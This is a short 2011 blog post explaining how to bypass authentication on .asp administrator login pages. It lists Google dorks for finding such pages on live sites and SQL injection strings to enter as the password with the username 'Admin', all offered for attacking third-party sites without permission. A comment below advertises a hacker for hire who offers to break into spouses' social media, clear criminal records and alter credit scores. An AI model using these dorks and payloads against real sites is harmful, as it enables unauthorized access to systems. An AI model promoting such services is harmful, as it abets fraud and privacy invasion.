Pages

Sunday, August 28, 2011

Gaining Auth Bypass On an Admin Account

 

Most sites vulnerable to this are .asp

First we need 2 find a site, start by opening google.

Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"

There is a large number of google dork for basic sql injection.

here is the best:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

"inurl:admin_login.asp"

"inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"

Now what to do once we get to our site.

the site should look something like this :

welcome to xxxxxxxxxx administrator panel

username :

password :

so what we do here is in the username we always type "Admin"

and for our password we type our sql injection

here is a list of sql injections

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --
at

1 comment:

  1. felisha greenNovember 8, 2020 at 2:19 PM

    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete